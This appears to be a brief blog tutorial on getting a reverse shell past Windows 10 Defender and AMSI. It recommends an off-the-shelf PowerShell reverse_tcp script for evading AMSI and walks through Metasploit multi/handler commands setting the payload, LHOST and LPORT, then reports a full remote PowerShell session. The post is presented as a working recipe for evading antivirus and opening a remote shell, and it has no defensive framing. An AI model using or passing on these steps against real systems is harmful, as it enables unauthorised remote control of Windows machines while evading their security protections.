Most of the standard off-the-shelf packages that generate payloads on Kali Linux are useless against the latest Windows 10 Defender (as of writing, December 2020). I was able to generate payloads that could get past the virus checks, but the problem is when executing: Windows AMSI (Anti-Malware Scan Interface) will recognize and kill the file.
After a lot of hunting around I found this
This is a collection of PowerShell scripts that will open a reverse_tcp connection. So far it's the only thing I have managed to make work on the latest Windows 10 Defender, and it defeats AMSI.
So go ahead and start up Metasploit on your Linux machine,
and then we will use the multi/handler with a Windows shell payload.
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
and set the LHOST and LPORT parameters before starting the listener.
msf6 exploit(multi/handler) > set LHOST 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Now we will go to our Windows machine and run the powershell_reverse_tcp.ps1 script from Ivan Sincek.
You will see that it runs successfully without any warnings, despite Windows Defender being turned on.
On our Linux machine we now have a full PowerShell session.
The script from Ivan is really excellent, and after many hours of trying different payloads, editing payloads and so on, this was the best result I got, and it's just an "off the shelf" solution!